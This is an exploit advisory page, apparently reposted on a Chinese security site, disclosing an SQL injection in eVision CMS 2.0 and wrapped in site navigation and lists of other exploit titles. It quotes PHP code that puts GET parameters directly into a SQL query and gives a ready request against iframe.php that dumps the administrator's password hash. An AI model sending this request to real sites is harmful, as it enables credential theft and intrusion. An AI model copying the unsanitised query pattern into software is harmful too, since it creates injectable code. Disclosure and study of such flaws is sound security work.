首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
eVision CMS <= 2.0 (field) SQL Injection Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
--+++============================================================+++--
--+++====== eVision CMS <= 2.0 SQL Injection Vulnerability ======+++--
--+++============================================================+++--

[+] Author  : darkjoker
[+] Site    : http://darkjoker.net23.net
[+] Download: http://kent.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz

[+] Vulnerable code:

    67  $sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'";
    68  $result = mysql_query($sql);
    69  $row = mysql_fetch_array($result);
    70
    71  if ( isset($_GET['div']) ) { $div = 'class="'.$_GET['div'].'"'; }
    72  else { $div = ''; }
    73  if ( isset($_GET['font']) ) { $font = 'class="'.$_GET['font'].'"'; }
    74  else { $font = ''; }
    75
    76  echo '
    77  <html '.$div.'>
    78  <head>
    79          <meta http-equiv="Content-Type" content="text/html; charset='.$charset.'">
    80          <link rel="stylesheet" type="text/css" href="'.$path.'style.php?template='.$template.'&module='.$_GET['module'].'">
    81  </head>
    82  <body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0" '.$font.'>'.set_text($row[$_GET['field']]).'</body>
    83  </html>
    84  ';


[+] It prints admin's password (hashed):

[+] /iframe.php?field=pass&module=users&id=1

# [2009-01-30]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SkaLinks 1.5 (Auth Bypass) SQL
·Spider Player 2.3.9.5 (asx Fil
·Orca 2.0.2 (Topic) Remote XSS
·Google Chrome 1.0.154.46 (Chro
·BPAutoSales 1.0.1 (XSS/SQL) Mu
·Jieqi cms v1.5 remote code exe
·GOM Player 2.0.12 (.PLS) Unive
·MS09-001 SMB Dos Poc Exploit
·Synactis All_IN_THE_BOX Active
·Php168 v2008 权限提升漏洞
·GNUBoard 4.31.04 (09.01.30) Mu
·Amaya Web Editor 11 Remote SEH
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved